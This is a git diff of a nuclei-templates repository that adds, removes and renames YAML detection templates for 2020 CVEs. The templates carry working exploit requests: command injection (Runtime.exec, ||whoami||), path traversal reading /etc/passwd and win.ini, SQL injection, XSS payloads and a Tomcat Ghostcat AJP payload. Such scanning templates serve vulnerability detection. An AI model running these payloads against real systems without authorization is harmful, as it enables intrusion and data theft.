CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-13942 - cwe-id: CWE-74 - -requests: - - method: POST - path: - - "{{BaseURL}}/context.json" - headers: - Content-Type: application/json - body: | - { - "filters": [ - { - "id": "nuclei", - "filters": [ - { - "condition": { - "parameterValues": { - "nuclei": "script::Runtime.getRuntime().exec('id')" - }, - "type": "profilePropertyCondition" - } - } - ] - } - ], - "sessionId": "nuclei" - } - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/json" - - "context-profile-id" - condition: and - part: header - - type: regex - regex: - - "(profile|session)(Id|Properties|Segments)" - - "[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12}" - condition: and - part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-13945.yaml b/nuclei-templates/CVE-2020/cve-2020-13945.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-13945.yaml rename to nuclei-templates/CVE-2020/cve-2020-13945.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-14181.yaml b/nuclei-templates/CVE-2020/cve-2020-14181.yaml new file mode 100644 index 0000000000..a71ed9dfb5 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-14181.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-14181 + +info: + name: User enumeration via insecure Jira endpoint + author: bjhulst + severity: medium + description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the /ViewUserHover.jspa endpoint. The affected versions are before version 7.13.6, from version 8.0.0 before 8.5.7, and from version 8.6.0 before 8.12.0. + reference: + - https://jira.atlassian.com/browse/JRASERVER-71560 + - http://packetstormsecurity.com/files/161730/Atlassian-JIRA-8.11.1-User-Enumeration.html + tags: cve,cve2020,atlassian,jira + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-14181 + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/secure/ViewUserHover.jspa" + + matchers-condition: and + matchers: + - type: word + words: + - "User does not exist" + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-14408.yaml b/nuclei-templates/CVE-2020/cve-2020-14408.yaml new file mode 100644 index 0000000000..2f1c79e2ee --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-14408.yaml @@ -0,0 +1,53 @@ +id: CVE-2020-14408 + +info: + name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting + author: edoardottt + severity: medium + description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to the latest version of Agentejo Cockpit or apply the vendor-provided patch to fix the XSS vulnerability. + reference: + - https://github.com/agentejo/cockpit/issues/1310 + - https://nvd.nist.gov/vuln/detail/CVE-2020-14408 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/StarCrossPortal/scalpel + - https://github.com/anonymous364872/Rapier_Tool + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-14408 + cwe-id: CWE-79 + epss-score: 0.00113 + epss-percentile: 0.44682 + cpe: cpe:2.3:a:agentejo:cockpit:0.10.2:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: agentejo + product: cockpit + tags: cve2020,cve,cockpit,agentejo,xss,oss + +http: + - method: GET + path: + - "{{BaseURL}}/auth/login?to=/92874%27;alert(document.domain)//280" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "redirectTo = '/92874';alert(document.domain)//280';" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022100d9c05fb3baf867f35afbb4c5ecbc371b317d9ad9a8ce6ccb6c7fdbc1f3231cf902207c1160d456c6b712685c5c2f9c8f5a2c8102f6d5ec75ce531f6daa39b39f4bd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-14413.yaml b/nuclei-templates/CVE-2020/cve-2020-14413.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14413.yaml rename to nuclei-templates/CVE-2020/cve-2020-14413.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-14815.yaml b/nuclei-templates/CVE-2020/cve-2020-14815.yaml deleted file mode 100644 index dc1ae9940d..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-14815.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: CVE-2020-14815 - -info: - name: Oracle Business Intelligence XSS - author: pikpikcu - severity: medium - reference: https://www.oracle.com/security-alerts/cpuoct2020.html - tags: cve,cve2020,oracle,xss - source: https://twitter.com/HackerOn2Wheels/status/1326927875279380480 - -requests: - - method: GET - path: - - "{{BaseURL}}/bi-security-login/login.jsp?msi=false&redirect=%22%3E%3Cimg/src/onerror%3dalert(document.domain)%3E" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "X-Oracle-Dms-Ecid:" - - "X-Oracle-Dms-Rid:" - - "Set-Cookie:" - part: header - condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-14864.yaml b/nuclei-templates/CVE-2020/cve-2020-14864.yaml new file mode 100644 index 0000000000..e2e0206f06 --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-14864.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-14864 +info: + name: Oracle Fusion - "getPreviewImage" Directory Traversal/Local File Inclusion + description: 'Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - "getPreviewImage" Directory Traversal/Local File Inclusion' + author: Ivo Palazzolo (@palaziv) + severity: high + tags: cve,cve2020,oracle,lfi + reference: + - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html + - https://www.oracle.com/security-alerts/cpuoct2020.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.50 + cve-id: CVE-2020-14864 + +requests: + - method: GET + path: + - '{{BaseURL}}/analytics/saw.dll?bieehome&startPage=1' # grab autologin cookies + - '{{BaseURL}}/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd' + cookie-reuse: true + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: regex + regex: + - 'root:.*:0:0' + part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-14883.yaml b/nuclei-templates/CVE-2020/cve-2020-14883.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-14883.yaml rename to nuclei-templates/CVE-2020/cve-2020-14883.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-15050.yaml b/nuclei-templates/CVE-2020/cve-2020-15050.yaml deleted file mode 100644 index c3a0c4953d..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-15050.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: CVE-2020-15050 - -info: - name: Suprema BioStar2 - Local File Inclusion (LFI) - author: gy741 - severity: high - description: An issue was discovered in the Video Extension in Suprema BioStar 2 before 2.8.2. Remote attackers can read arbitrary files from the server via Directory Traversal. - reference: - - http://packetstormsecurity.com/files/158576/Bio-Star-2.8.2-Local-File-Inclusion.html - - https://www.supremainc.com/en/support/biostar-2-pakage.asp - - https://nvd.nist.gov/vuln/detail/CVE-2020-15050 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 7.50 - cve-id: CVE-2020-15050 - tags: cve,cve2020,lfi,suprema,biostar2 - -requests: - - method: GET - path: - - "{{BaseURL}}/../../../../../../../../../../../../windows/win.ini" - - matchers: - - type: word - part: body - words: - - "bit app support" - - "fonts" - - "extensions" - condition: and diff --git a/nuclei-templates/CVE-2020/cve-2020-15129.yaml b/nuclei-templates/CVE-2020/cve-2020-15129.yaml new file mode 100644 index 0000000000..3b46eec92a --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-15129.yaml @@ -0,0 +1,31 @@ +id: CVE-2020-15129 + +info: + name: Open-redirect in Traefik + author: dwisiswant0 + severity: medium + description: There exists a potential open redirect vulnerability in Traefik's handling of the X-Forwarded-Prefix header. Active Exploitation of this issue is unlikely as it would require active header injection, however the Traefik team may want to address this issue nonetheless to prevent abuse in e.g. cache poisoning scenarios. + reference: https://securitylab.github.com/advisories/GHSL-2020-140-Containous-Traefik + tags: cve,cve2020,traefik,redirect + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 4.70 + cve-id: CVE-2020-15129 + cwe-id: CWE-601 + +requests: + - method: GET + path: + - "{{BaseURL}}" + headers: + X-Forwarded-Prefix: "https://foo.nl" + matchers-condition: and + matchers: + - type: status + status: + - 302 + - type: word + words: + - "Found" + condition: or + part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-15920.yaml b/nuclei-templates/CVE-2020/cve-2020-15920.yaml deleted file mode 100644 index 983229407e..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-15920.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2020-15920 - -info: - name: Unauthenticated RCE at Mida eFramework on 'PDC/ajaxreq.php' - author: dwisiswant0 - severity: critical - description: There is an OS Command Injection in Mida eFramework through 2.9.0 that allows an attacker to achieve Remote Code Execution (RCE) with administrative (root) privileges. No authentication is required. - reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html - tags: cve,cve2020,mida,rce - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-15920 - cwe-id: CWE-78 - -requests: - - method: POST - path: - - "{{BaseURL}}/PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - regex: - - "root:.*:0:0:" - part: body diff --git a/nuclei-templates/CVE-2020/cve-2020-16846.yaml b/nuclei-templates/CVE-2020/cve-2020-16846.yaml deleted file mode 100644 index 372a0572b7..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-16846.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: CVE-2020-16846 - -info: - name: SaltStack Shell Injection - author: dwisiswant0 - severity: critical - description: | - SaltStack Salt through 3002. Sending crafted web requests to the Salt API, - with the SSH client enabled, can result in shell injection. - - This template supports the detection part only. See references. - reference: - - https://mp.weixin.qq.com/s/R8qw_lWizGyeJS0jOcYXag - - https://github.com/vulhub/vulhub/tree/master/saltstack/CVE-2020-16846 - tags: cve,cve2020,saltstack - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-16846 - cwe-id: CWE-78 - -requests: - - method: POST - path: - - "{{BaseURL}}/run" - body: "token=1337&client=ssh&tgt=*&fun=a&roster=projectdiscovery&ssh_priv=nuclei" - headers: - Content-Type: application/x-www-form-urlencoded # CherryPy will abort w/o define this header - matchers-condition: and - matchers: - - type: status - status: - - 500 - - type: word - words: - - "application/json" - part: header - - type: word - words: - - "An unexpected error occurred" - part: body \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-16920.yaml b/nuclei-templates/CVE-2020/cve-2020-16920.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-16920.yaml rename to nuclei-templates/CVE-2020/cve-2020-16920.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-16952.yaml b/nuclei-templates/CVE-2020/cve-2020-16952.yaml deleted file mode 100644 index 30a86624e1..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-16952.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: CVE-2020-16952 - -info: - name: Microsoft SharePoint Server-Side Include (SSI) and ViewState RCE - author: dwisiswant0 - severity: high - description: A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-16951. - reference: - - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952 - - https://srcincite.io/pocs/cve-2020-16952.py.txt - - https://github.com/rapid7/metasploit-framework/blob/1a341ae93191ac5f6d8a9603aebb6b3a1f65f107/documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md - tags: cve,cve2020,sharepoint,iis,microsoft - classification: - cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 7.80 - cve-id: CVE-2020-16952 - cwe-id: CWE-346 - -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: regex - regex: - - "15\\.0\\.0\\.(4571|5275|4351|5056)" - - "16\\.0\\.0\\.(10337|10364|10366)" - # - "16.0.10364.20001" - condition: or - part: body - - type: word - words: - - "MicrosoftSharePointTeamServices" - part: header - - type: status - status: - - 200 - - 201 - condition: or diff --git a/nuclei-templates/CVE-2020/cve-2020-17505.yaml b/nuclei-templates/CVE-2020/cve-2020-17505.yaml new file mode 100644 index 0000000000..66a697edcf --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-17505.yaml @@ -0,0 +1,41 @@ +id: CVE-2020-17505 + +info: + name: Artica Web Proxy 4.30 OS Command Injection + author: dwisiswant0 + severity: high + description: Artica Web Proxy 4.30.000000 allows an authenticated remote attacker to inject commands via the service-cmds parameter in cyrus.php. These commands are executed with root privileges via service_cmds_peform. + tags: cve,cve2020,rce,artica,proxy + reference: https://blog.max0x4141.com/post/artica_proxy/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.80 + cve-id: CVE-2020-17505 + cwe-id: CWE-78 + +requests: + - raw: + - | + GET /fw.login.php?apikey=%27UNION%20select%201,%27YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=%27; HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + - | + GET /cyrus.index.php?service-cmds-peform=%7C%7Cwhoami%7C%7C HTTP/1.1 + Host: {{Hostname}} + Accept: */* + + cookie-reuse: true + matchers-condition: and + matchers: + - type: word + words: + - "array(2)" + - "Position: ||whoami||" + - "root" + condition: and + + part: body + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-17518.yaml b/nuclei-templates/CVE-2020/cve-2020-17518.yaml new file mode 100644 index 0000000000..8d102b311e --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-17518.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-17518 + +info: + name: Apache Flink Upload Path Traversal + author: pdteam + severity: high + reference: https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17518 + description: | + Apache Flink 1.5.1 introduced a REST handler that allows you to write an uploaded file to an arbitrary location on the local file system, + through a maliciously modified HTTP HEADER. + tags: cve,cve2020,apache,lfi,flink,upload + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N + cvss-score: 7.50 + cve-id: CVE-2020-17518 + cwe-id: CWE-22 + +requests: + - raw: + - | + POST /jars/upload HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryoZ8meKnrrso89R6Y + + ------WebKitFormBoundaryoZ8meKnrrso89R6Y + Content-Disposition: form-data; name="jarfile"; filename="../../../../../../../tmp/poc" + + test-poc + ------WebKitFormBoundaryoZ8meKnrrso89R6Y-- + + - method: GET + path: + - '{{BaseURL}}/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252ftmp%252fpoc' + + matchers: + - type: dsl + dsl: + - 'contains(body, "test-poc") && status_code == 200' # Using CVE-2020-17519 to confirm this. diff --git a/nuclei-templates/CVE-2020/cve-2020-19282.yaml b/nuclei-templates/CVE-2020/cve-2020-19282.yaml deleted file mode 100644 index 729970b1ac..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-19282.yaml +++ /dev/null @@ -1,38 +0,0 @@ -id: CVE-2020-19282 - -info: - name: Jeesns 1.4.2 XSS - author: pikpikcu - severity: medium - description: Reflected cross-site scripting (XSS) vulnerability in Jeesns 1.4.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload in the system error message's text field. - reference: - - https://github.com/zchuanzhao/jeesns/issues/11 - - https://nvd.nist.gov/vuln/detail/CVE-2020-19282 - tags: cve,cve2020,jeesns,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2020-19282 - cwe-id: CWE-79 - -requests: - - method: GET - path: - - "{{BaseURL}}/error?msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - matchers-condition: and - matchers: - - - type: word - words: - - '' - part: body - - - type: status - status: - - 200 - - - type: word - part: header - words: - - text/html diff --git a/nuclei-templates/CVE-2020/CVE-2020-19295.yaml b/nuclei-templates/CVE-2020/cve-2020-19295.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-19295.yaml rename to nuclei-templates/CVE-2020/cve-2020-19295.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-19360.yaml b/nuclei-templates/CVE-2020/cve-2020-19360.yaml new file mode 100644 index 0000000000..69d08e80ff --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-19360.yaml @@ -0,0 +1,29 @@ +id: CVE-2020-19360 +info: + name: FHEM 6.0 Local File Inclusion + author: 0x_Akoko + severity: high + description: FHEM version 6.0 suffers from a local file inclusion vulnerability. + reference: + - https://github.com/EmreOvunc/FHEM-6.0-Local-File-Inclusion-LFI-Vulnerability/blob/master/README.md + - https://www.cvedetails.com/cve/CVE-2020-19360/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-19360 + tags: fhem,lfi,cve,cve2020 + +requests: + - method: GET + path: + - "{{BaseURL}}/fhem/FileLog_logWrapper?dev=Logfile&file=%2fetc%2fpasswd&type=text" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/cve-2020-1938.yaml b/nuclei-templates/CVE-2020/cve-2020-1938.yaml deleted file mode 100644 index a698cc3677..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-1938.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2020-1938 - -info: - name: Ghostcat - Apache Tomcat AJP File Read/Inclusion Vulnerability - author: milo2012 - severity: critical - description: When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. - reference: https://www.tenable.com/blog/cve-2020-1938-ghostcat-apache-tomcat-ajp-file-readinclusion-vulnerability-cnvd-2020-10487 - tags: cve,cve2020,apache,tomcat,lfi,network - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2020-1938 - cwe-id: CWE-269 - -network: - - inputs: - - data: "{{hex_decode('1234020e02020008485454502f312e310000132f6578616d706c65732f78787878782e6a73700000093132372e302e302e3100ffff00093132372e302e302e31000050000009a006000a6b6565702d616c69766500000f4163636570742d4c616e677561676500000e656e2d55532c656e3b713d302e3500a00800013000000f4163636570742d456e636f64696e67000013677a69702c206465666c6174652c207364636800000d43616368652d436f6e74726f6c0000096d61782d6167653d3000a00e00444d6f7a696c6c612f352e3020285831313b204c696e7578207838365f36343b2072763a34362e3029204765636b6f2f32303130303130312046697265666f782f34362e30000019557067726164652d496e7365637572652d52657175657374730000013100a001004a746578742f68746d6c2c6170706c69636174696f6e2f7868746d6c2b786d6c2c6170706c69636174696f6e2f786d6c3b713d302e392c696d6167652f776562702c2a2f2a3b713d302e3800a00b00093132372e302e302e31000a00216a617661782e736572766c65742e696e636c7564652e726571756573745f7572690000012f000a001f6a617661782e736572766c65742e696e636c7564652e706174685f696e666f0000102f5745422d494e462f7765622e786d6c000a00226a617661782e736572766c65742e696e636c7564652e736572766c65745f706174680000012f00ff')}}" - - host: - - "{{Hostname}}" - - "{{Host}}:8009" - - read-size: 1024 - - matchers: - - type: word - words: - - "See the NOTICE file distributed with" diff --git a/nuclei-templates/CVE-2020/cve-2020-2103.yaml b/nuclei-templates/CVE-2020/cve-2020-2103.yaml deleted file mode 100644 index a8199bbc1a..0000000000 --- a/nuclei-templates/CVE-2020/cve-2020-2103.yaml +++ /dev/null @@ -1,56 +0,0 @@ -id: CVE-2020-2103 - -info: - name: Diagnostic page exposed session cookies - severity: medium - author: c-sh0 - description: Jenkins 2.218 and earlier, LTS 2.204.1 and earlier exposed session identifiers on a users detail object in the whoAmI diagnostic page. - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2020-2103 - - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695 - metadata: - shodan-query: http.favicon.hash:81586312 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N - cvss-score: 5.40 - cve-id: CVE-2020-2103 - cwe-id: CWE-200 - tags: cve,cve2020,jenkins - -requests: - - raw: - - | - GET {{BaseURL}}/whoAmI/ HTTP/1.1 - Host: {{Hostname}} - - - | - GET {{BaseURL}}/whoAmI/ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - req-condition: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: header - words: - - 'text/html' - - 'x-jenkins' - condition: and - case-insensitive: true - - - type: word - part: body_2 - words: - - 'Cookie' - - 'SessionId: null' - condition: and - - extractors: - - type: kval - kval: - - x_jenkins \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/CVE-2020-2199.yaml b/nuclei-templates/CVE-2020/cve-2020-2199.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-2199.yaml rename to nuclei-templates/CVE-2020/cve-2020-2199.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-22208.yaml b/nuclei-templates/CVE-2020/cve-2020-22208.yaml new file mode 100644 index 0000000000..ff8cb13e1b --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-22208.yaml @@ -0,0 +1,44 @@ +id: CVE-2020-22208 + +info: + name: 74cms - ajax_street.php 'x' SQL Injection + author: ritikchaddha + severity: critical + description: | + SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php. + impact: | + Successful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the underlying database. + remediation: | + Apply the vendor-provided patch or update to the latest version of 74cms to mitigate the SQL Injection vulnerability. + reference: + - https://github.com/blindkey/cve_like/issues/10 + - https://nvd.nist.gov/vuln/detail/CVE-2020-22208 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-22208 + cwe-id: CWE-89 + epss-score: 0.19578 + epss-percentile: 0.9585 + cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: 74cms + product: 74cms + shodan-query: http.html:"74cms" + fofa-query: app="74cms" + tags: cve2020,cve,74cms,sqli +variables: + num: "999999999" + +http: + - method: GET + path: + - '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11�%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#' + + matchers: + - type: word + part: body + words: + - '{{md5({{num}})}}' +# digest: 4b0a00483046022100b445b86b8bc851dfc73d48b1385c99d7ad711230fa56e43efd02d7755d29ea84022100bfc90c7ba695df767a9f32c5eb3a29bf895e0af68b1d4c163438eaf8bfc221b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2020/cve-2020-22210.yaml b/nuclei-templates/CVE-2020/cve-2020-22210.yaml index 5002d18314..21a2f6aa4e 100644 --- a/nuclei-templates/CVE-2020/cve-2020-22210.yaml +++ b/nuclei-templates/CVE-2020/cve-2020-22210.yaml @@ -1,45 +1,23 @@ id: CVE-2020-22210 - info: - name: 74cms - ajax_officebuilding.php SQL Injection - author: ritikchaddha - severity: critical - description: | - A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. - impact: | - Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. - remediation: | - Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file. + author: princechaddha + name: 74cms Sql Injection + severity: high + tags: 74cms,sqli + description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php. reference: - - https://github.com/blindkey/cve_like/issues/11 - https://nvd.nist.gov/vuln/detail/CVE-2020-22210 - - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/blindkey/cve_like/issues/11 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 cve-id: CVE-2020-22210 - cwe-id: CWE-89 - epss-score: 0.20254 - epss-percentile: 0.95933 - cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: 74cms - product: 74cms - shodan-query: http.html:"74cms" - fofa-query: app="74cms" - tags: cve,cve2020,74cms,sqli -variables: - num: "999999999" - -http: +requests: - method: GET path: - - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23' - + - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a' matchers: - type: word - part: body words: - - '{{md5({{num}})}}' -# digest: 4a0a00473045022100871fd309f948d3202f0de9e37571c921c7c90656777d3fd15ab38733ad2408c102204f62211c931f9e30ab1ff0bf20bb503191ed0af758f8fe2b0373f48ec8bcd315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + - "e807f1fcf82d132f9bb018ca6738a19f" + part: body + +# Enhanced by mp on 2022/03/02 diff --git a/nuclei-templates/CVE-2020/CVE-2020-23015.yaml b/nuclei-templates/CVE-2020/cve-2020-23015.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-23015.yaml rename to nuclei-templates/CVE-2020/cve-2020-23015.yaml diff --git a/nuclei-templates/CVE-2020/cve-2020-23575.yaml b/nuclei-templates/CVE-2020/cve-2020-23575.yaml new file mode 100644 index 0000000000..54f887663c --- /dev/null +++ b/nuclei-templates/CVE-2020/cve-2020-23575.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-23575 + +info: + name: Kyocera Printer d-COPIA253MF - Directory Traversal + author: 0x_Akoko + severity: high + description: A directory traversal vulnerability exists in Kyocera Printer d-COPIA253MF plus. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server. + reference: + - https://www.exploit-db.com/exploits/48561 + - https://www.cvedetails.com/cve/CVE-2020-23575 + - https://www.kyoceradocumentsolutions.com.tr/tr.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-23575 + cwe-id: CWE-22 + tags: cve,cve2020,printer,iot,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "root:.*:0:0" + - "bin:.*:1:1" + condition: or + + - type: status + status: + - 200 diff --git a/nuclei-templates/CVE-2020/CVE-2020-24550.yaml b/nuclei-templates/CVE-2020/cve-2020-24550.yaml similarity index 100% rename from nuclei-templates/CVE-2020/CVE-2020-24550.yaml 